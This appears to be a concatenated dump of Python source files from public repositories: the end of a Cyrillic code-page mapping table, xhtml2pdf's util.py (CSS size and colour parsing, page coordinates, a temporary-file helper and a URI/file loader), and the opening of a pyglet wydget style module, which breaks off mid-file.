0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x0440, # CYRILLIC SMALL LETTER ER
0x00e1: 0x0441, # CYRILLIC SMALL LETTER ES
0x00e2: 0x0442, # CYRILLIC SMALL LETTER TE
0x00e3: 0x0443, # CYRILLIC SMALL LETTER U
0x00e4: 0x0444, # CYRILLIC SMALL LETTER EF
0x00e5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00e6: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00e7: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00e8: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00e9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00ea: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x00eb: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00ec: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00ed: 0x044d, # CYRILLIC SMALL LETTER E
0x00ee: 0x044e, # CYRILLIC SMALL LETTER YU
0x00ef: 0x044f, # CYRILLIC SMALL LETTER YA
0x00f0: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x00f1: 0x0451, # CYRILLIC SMALL LETTER IO
0x00f2: 0x0404, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x00f3: 0x0454, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x00f4: 0x0407, # CYRILLIC CAPITAL LETTER YI
0x00f5: 0x0457, # CYRILLIC SMALL LETTER YI
0x00f6: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U
0x00f7: 0x045e, # CYRILLIC SMALL LETTER SHORT U
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x2116, # NUMERO SIGN
0x00fd: 0x00a4, # CURRENCY SIGN
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
|
Ashaba/rms
|
refs/heads/master
|
rmslocalenv/lib/python2.7/site-packages/xhtml2pdf/util.py
|
23
|
# -*- coding: utf-8 -*-
from reportlab.lib.colors import Color, CMYKColor, getAllNamedColors, toColor, \
HexColor
from reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT, TA_JUSTIFY
from reportlab.lib.units import inch, cm
import base64
import httplib
import logging
import mimetypes
import os.path
import re
import reportlab
import shutil
import string
import sys
import tempfile
import types
import urllib
import urllib2
import urlparse
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
_reportlab_version = tuple(map(int, reportlab.Version.split('.')))
if _reportlab_version < (2,1):
raise ImportError("Reportlab Version 2.1+ is needed!")
REPORTLAB22 = _reportlab_version >= (2, 2)
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
log = logging.getLogger("xhtml2pdf")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import PyPDF2
except:
PyPDF2 = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
#===============================================================================
# Memoize decorator
#===============================================================================
class memoized(object):
"""
A kwargs-aware memoizer, better than the one in python :)
Don't pass in too large kwargs, since this turns them into a tuple of tuples
Also, avoid mutable types (as usual for memoizers)
What this does is to create a dictionnary of {(*parameters):return value},
and uses it as a cache for subsequent calls to the same method.
It is especially useful for functions that don't rely on external variables
and that are called often. It's a perfect match for our getSize etc...
"""
def __init__(self, func):
self.cache = {}
self.func = func
self.__doc__ = self.func.__doc__ # To avoid great confusion
self.__name__ = self.func.__name__ # This also avoids great confusion
def __call__(self, *args, **kwargs):
# Make sure the following line is not actually slower than what you're
# trying to memoize
args_plus = tuple(kwargs.iteritems())
key = (args, args_plus)
try:
if key not in self.cache:
res = self.func(*args, **kwargs)
self.cache[key] = res
return self.cache[key]
except TypeError:
# happens if any of the parameters is a list
return self.func(*args, **kwargs)
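# A minimal usage sketch for the memoizer above; the function name `scale`
# is hypothetical and not part of this module:
#
#     @memoized
#     def scale(value, factor=1.0):
#         return value * factor
#
#     scale(3, factor=2.0)  # computed once, cached under ((3,), (('factor', 2.0),))
#     scale(3, factor=2.0)  # second call is served from self.cache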
def ErrorMsg():
"""
Helper to get a nice traceback as string
"""
import traceback, sys
type = value = tb = limit = None
type, value, tb = sys.exc_info()
list = traceback.format_tb(tb, limit) + traceback.format_exception_only(type, value)
return "Traceback (innermost last):\n" + "%-20s %s" % (
string.join(list[: - 1], ""),
list[- 1])
def toList(value):
if type(value) not in (types.ListType, types.TupleType):
return [value]
return list(value)
@memoized
def getColor(value, default=None):
"""
Convert to color value.
This returns a Color object instance from a text bit.
"""
if isinstance(value, Color):
return value
value = str(value).strip().lower()
if value == "transparent" or value == "none":
return default
if value in COLOR_BY_NAME:
return COLOR_BY_NAME[value]
if value.startswith("#") and len(value) == 4:
value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
elif rgb_re.search(value):
# e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
r, g, b = [int(x) for x in rgb_re.search(value).groups()]
value = "#%02x%02x%02x" % (r, g, b)
else:
# Shrug
pass
return toColor(value, default) # Calling the reportlab function
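# For illustration, the following inputs should all resolve to equivalent
# magenta Color instances (sketch only, not executed at import time):
#
#     getColor("#f0f")
#     getColor("#ff00ff")
#     getColor("rgb(255, 0, 255)")
#     getColor("fuchsia")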
def getBorderStyle(value, default=None):
# log.debug(value)
if value and (str(value).lower() not in ("none", "hidden")):
return value
return default
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
@memoized
def getSize(value, relative=0, base=None, default=0.0):
"""
    Converts strings to standard sizes.
    That is, it takes a CSS size string ('12pt', '1cm' and so on) and
    converts it into a float in a standard unit (in our case, points).
>>> getSize('12pt')
12.0
>>> getSize('1cm')
28.346456692913385
"""
try:
original = value
if value is None:
return relative
elif type(value) is types.FloatType:
return value
elif isinstance(value, int):
return float(value)
elif type(value) in (types.TupleType, types.ListType):
value = "".join(value)
value = str(value).strip().lower().replace(",", ".")
if value[-2:] == 'cm':
return float(value[:-2].strip()) * cm
elif value[-2:] == 'mm':
return float(value[:-2].strip()) * mm # 1mm = 0.1cm
        elif value[-4:] == 'inch':
            return float(value[:-4].strip()) * inch  # 1in == 72pt
        elif value[-2:] == 'in':
            return float(value[:-2].strip()) * inch  # 1in == 72pt
elif value[-2:] == 'pt':
return float(value[:-2].strip())
elif value[-2:] == 'pc':
return float(value[:-2].strip()) * 12.0 # 1pc == 12pt
        elif value[-2:] == 'px':
            return float(value[:-2].strip()) * dpi96  # W3C says to use 96dpi; http://www.w3.org/TR/CSS21/syndata.html#length-units
elif value[-1:] == 'i': # 1pt == 1/72inch
return float(value[:-1].strip()) * inch
elif value in ("none", "0", "auto"):
return 0.0
elif relative:
if value[-2:] == 'em': # XXX
return float(value[:-2].strip()) * relative # 1em = 1 * fontSize
elif value[-2:] == 'ex': # XXX
return float(value[:-2].strip()) * (relative / 2.0) # 1ex = 1/2 fontSize
elif value[-1:] == '%':
return (relative * float(value[:-1].strip())) / 100.0 # 1% = (fontSize * 1) / 100
elif value in ("normal", "inherit"):
return relative
elif value in _relativeSizeTable:
if base:
return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
elif value in _absoluteSizeTable:
if base:
return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
else:
return max(MIN_FONT_SIZE, relative * float(value))
        try:
            value = float(value)
        except ValueError:
            log.warn("getSize: Not a float %r", value)
            return default  # value = 0
return max(0, value)
except Exception:
log.warn("getSize %r %r", original, relative, exc_info=1)
return default
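# Relative units depend on the `relative` (and optionally `base`) arguments.
# A few illustrative expectations, assuming a 12pt context (sketch only):
#
#     getSize('2em', relative=12)     # -> 24.0 (1em == relative)
#     getSize('50%', relative=12)     # -> 6.0
#     getSize('larger', relative=12)  # -> 15.0 (12 * 1.25)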
@memoized
def getCoords(x, y, w, h, pagesize):
"""
    As a stupid programmer I like to use the upper-left corner of the
    document as the (0, 0) coordinate, therefore we need to do some
    fancy calculations here.
"""
#~ print pagesize
ax, ay = pagesize
if x < 0:
x = ax + x
if y < 0:
y = ay + y
    if w is not None and h is not None:
if w <= 0:
w = (ax - x + w)
if h <= 0:
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
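# Coordinate-flip sketch: on a 595x842pt page, a 100x50 box whose top-left
# corner sits at (10, 20) measured from the top of the page becomes
#
#     getCoords(10, 20, 100, 50, (595, 842))  # -> (10, 772, 100, 50)
#
# because ReportLab measures y upwards from the bottom of the page.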
@memoized
def getBox(box, pagesize):
"""
    Parse a box given as corners in the form:
    <X-Left> <Y-Upper> <Width> <Height>
    The last two values, when negative, are interpreted as offsets from
    the right and lower page borders.
    """
    box = str(box).split()
    if len(box) != 4:
        raise Exception, "box requires four values: <x> <y> <width> <height>"
x, y, w, h = [getSize(pos) for pos in box]
return getCoords(x, y, w, h, pagesize)
def getFrameDimensions(data, page_width, page_height):
"""Calculate dimensions of a frame
Returns left, top, width and height of the frame in points.
"""
box = data.get("-pdf-frame-box", [])
if len(box) == 4:
return [getSize(x) for x in box]
top = getSize(data.get("top", 0))
left = getSize(data.get("left", 0))
bottom = getSize(data.get("bottom", 0))
right = getSize(data.get("right", 0))
if "height" in data:
height = getSize(data["height"])
if "top" in data:
top = getSize(data["top"])
bottom = page_height - (top + height)
elif "bottom" in data:
bottom = getSize(data["bottom"])
top = page_height - (bottom + height)
if "width" in data:
width = getSize(data["width"])
if "left" in data:
left = getSize(data["left"])
right = page_width - (left + width)
elif "right" in data:
right = getSize(data["right"])
left = page_width - (right + width)
top += getSize(data.get("margin-top", 0))
left += getSize(data.get("margin-left", 0))
bottom += getSize(data.get("margin-bottom", 0))
right += getSize(data.get("margin-right", 0))
width = page_width - (left + right)
height = page_height - (top + bottom)
return left, top, width, height
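# Frame-dimension sketch (hypothetical input dictionary): on a 595x842pt page
#
#     getFrameDimensions({"top": "10pt", "left": "10pt",
#                         "width": "200pt", "height": "100pt"}, 595, 842)
#
# comes out as (10.0, 10.0, 200.0, 100.0), i.e. left, top, width, height.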
@memoized
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = [getSize(pos) for pos in position]
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""
    A temporary file implementation that uses memory unless
    either capacity is breached or fileno() is requested, at which
    point a real temporary file will be created and the relevant
    details returned.
    If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
        try:
            self._delegate = self.STRATEGIES[self.strategy]()
        except Exception:
            # Fallback for Google App Engine etc.
            self._delegate = self.STRATEGIES[0]()
self.write(buffer)
# we must set the file's position for preparing to read
self.seek(0)
def makeTempFile(self):
"""
Switch to next startegy. If an error occured stay with the first strategy
"""
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
"""
Get a named temporary file
"""
self.makeTempFile()
return self.name
def fileno(self):
"""
Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
"""
Get value of file. Work around for second strategy
"""
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
"""
If capacity != -1 and length of file > capacity it is time to switch
"""
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
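# pisaTempFile usage sketch: small payloads stay in memory, large ones spill
# over to a real temporary file (a capacity of 16 bytes is artificially small
# for the demo):
#
#     buf = pisaTempFile("x" * 8, capacity=16)  # strategy 0: StringIO
#     buf.write("y" * 32)                       # crosses capacity -> temp file
#     buf.getvalue()                            # -> "x" * 8 + "y" * 32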
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = uri.encode('utf-8')
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not urlparse.urlparse(uri).scheme:
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
if urlParts.scheme == 'file':
if basepath and uri.startswith('/'):
uri = urlparse.urljoin(basepath, uri[1:])
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
# Drive letters have len==1 but we are looking for things like http:
elif urlParts.scheme in ('http', 'https'):
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
self.mimetype = r1.getheader("Content-Type", '').split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
import gzip
try:
import cStringIO as StringIO
                        except ImportError:
import StringIO
self.file = gzip.GzipFile(mode="rb", fileobj=StringIO.StringIO(r1.read()))
else:
self.file = r1
else:
try:
urlResponse = urllib2.urlopen(uri)
except urllib2.HTTPError:
return
self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_file = tempfile.NamedTemporaryFile()
if self.file:
shutil.copyfileobj(self.file, self.tmp_file)
else:
self.tmp_file.write(self.getData())
self.tmp_file.flush()
return self.tmp_file.name
def getData(self):
if self.data is not None:
return self.data
if self.file is not None:
self.data = self.file.read()
return self.data
return None
def notFound(self):
return (self.file is None) and (self.data is None)
def setMimeTypeByName(self, name):
" Guess the mime type "
        mimetype = mimetypes.guess_type(name)[0]
        if mimetype is not None:
            self.mimetype = mimetype.split(";")[0]
def getFile(*a, **kw):
    result = pisaFileObject(*a, **kw)
    if result.notFound():
        return None
    return result
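# getFile sketch with an inline data URI, which needs no network access:
#
#     f = getFile("data:text/plain;base64,aGVsbG8=")
#     f.getData()   # -> "hello"
#     f.mimetype    # -> "text/plain"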
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)
}
|
Austin503/pyglet
|
refs/heads/master
|
contrib/wydget/wydget/style.py
|
29
|
from pyglet.gl import *
from pyglet import font
from layout import *
import util
class Style(object):
font_name = ''
font_size = 14
def getFont(self, name=None, size=None):
if name is None: name = self.font_name
if size is None: size = self.font_size
return font.load(name, size)
def getGlyphString(self, text, name=None, size=None):
glyphs = self.getFont(name=name, size=size).get_glyphs(text)
return font.GlyphString(text, glyphs)
def text(self, text, color=(0, 0, 0, 1), font_size=None,
font_name=None, halign='left', width=None,
valign=font.Text.BOTTOM):
if font_size is None: font_size = self.font_size
if font_name is None: font_name = self.font_name
f = self.getFont(name=font_name, size=font_size)
return font.Text(f, text, color=color, halign=halign, width=width,
valign=valign)
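    # Usage sketch (hypothetical values): render a label with the default
    # face, overriding only the size:
    #
    #     style = Style()
    #     label = style.text('hello', font_size=24)
    #     label.draw()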
def textAsTexture(self, text, color=(0, 0, 0, 1), bgcolor=(1, 1, 1, 0),
font_size=None, font_name=None, halign='left', width=None,
rotate=0):
label = self.text(text, color=color, font_size=font_size,
font_name=font_name, halign=halign, width=width, valign='top')
        label.width  # touch width first to force the deferred layout calculation
w = int(width or label.width)
h = font_size * len(label.lines) #int(label.height)
x = c_int()
def _f():
glPushAttrib(GL_COLOR_BUFFER_BIT|GL_ENABLE_BIT|GL_CURRENT_BIT)
glEnable(GL_TEXTURE_2D)
glDisable(GL_DEPTH_TEST)
glClearColor(*bgcolor)
glClear(GL_COLOR_BUFFER_BIT)
glPushMatrix()
if rotate == 0:
glTranslatef(0, h, 0)
if rotate:
glRotatef(rotate, 0, 0, 1)
if rotate == 270:
glTranslatef(-w, h, 0)
if rotate == 180:
glTranslatef(-w, 0, 0)
# prevent the text's alpha channel being written into the new
# texture
glColorMask(GL_TRUE, GL_TRUE, GL_TRUE, GL_FALSE)
label.draw()
glPopMatrix()
glPopAttrib()
if rotate in (0, 180):
return util.renderToTexture(w, h, _f)
else:
return util.renderToTexture(h, w, _f)
stylesheet = '''
